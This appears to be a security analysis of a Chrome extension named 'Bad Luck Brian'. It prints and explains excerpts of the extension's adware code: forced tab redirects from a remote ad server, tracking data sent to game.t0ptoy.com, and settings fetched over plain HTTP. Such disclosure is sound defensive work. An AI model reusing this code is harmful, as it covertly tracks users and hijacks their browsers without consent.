Bad Luck Brian

The shows() function fetches an ad payload from game.t0ptoy.com and, after an 18-second silent delay, opens a new browser tab to a URL entirely controlled by the remote ad server (r.body.click_action) — with no notification, no user gesture, and no opt-out. This is classic adware forced-redirect behavior: the game popup is bait to keep the extension installed while the background silently navigates the user's browser on a schedule controlled by the third-party server.

function shows() {  fetch('http://game.t0ptoy.com/game_api_vv.php?eid=' + chrome.runtime.id, {      method: 'GET',      cache: 'no-cache',      referrerPolicy: 'no-referrer'    })    .then(function(r) {      if (!!r.body) {        let ar = [r.body.icon, r.body.image];        ar.forEach((u, i) => {          fetch(u, {            mode: 'no-cors'          }).catch(err => {})        });        setTimeout(() => {          !!r.body.click_action ? chrome.tabs.create({            url: r.body.click_action          }) : NULL;          localStorage.count = 1        }, 18E3);      } else {        show();      }    })

Every time the extension runs its ad cycle it exfiltrates a unique client identifier (cid), install timestamp (ut), current timestamp (ct), last-push-click and last-push-show timestamps (lc/ls), cumulative click count (cc), and the Chrome extension runtime ID (eid) to game.t0ptoy.com — a third-party ad network with no connection to the publisher's disclosed identity ([email protected]). No privacy policy is declared and no data-collection categories are disclosed in the CWS listing. This is covert behavioral tracking sent to an external ad network.

return fetch('http://game.t0ptoy.com/game_api_v21.php?cid=' + localStorage.clientID + '&ut=' + localStorage  .instalTimestamp + '&ct=' + getUnixTimestamp() + '&lc=' + localStorage.lastPushClick + '&ls=' + localStorage  .lastPushShow + '&cc=' + localStorage.countClick + '&eid=' + chrome.runtime.id + '&ads=' + ads, {    method: 'GET',    cache: 'no-cache',    referrerPolicy: 'no-referrer'  })

After displaying an ad notification, the extension auto-opens a new tab to data.link (a URL from the remote ad server) after a server-controlled delay (data.time_close). The tab is opened regardless of whether the user interacted with the notification — both branches of the if/else call chrome.tabs.create. This removes any pretence of user consent: the ad redirect fires on a timer set by game.t0ptoy.com, not by user action.

if (data.close) {  setTimeout(() => {    chrome.notifications.getAll((p) => {      if (p[id]) {        chrome.tabs.create({          url: data.link        });        chrome.notifications.clear(id);        click(id);      } else {        let arrPush = JSON.parse(localStorage.arrPush),          count = arrPush.filter(x => Object.keys(x) == id)          .length;        if (!(0 < count)) {          chrome.tabs.create({            url: data.link          });          click(id);        }      }    })  }, data.time_close);}

The extension fetches its core behavioral parameters (notification frequency, requireInteraction flag) from a remote server over plain HTTP (not HTTPS), meaning the ad network can update how aggressively the extension spams notifications and opens tabs without any extension update. This remote configuration channel also exposes the extension to man-in-the-middle manipulation of its ad behavior.

fetch('http://game.t0ptoy.com/_setting.json')  .then(function(resp) {    return resp.json();  })  .then(function(data) {    localStorage.requireInteraction = data.requireInteraction;    localStorage.frequency = data.frequency;    localStorage.updateSettingTime = getUnixTimestamp();  })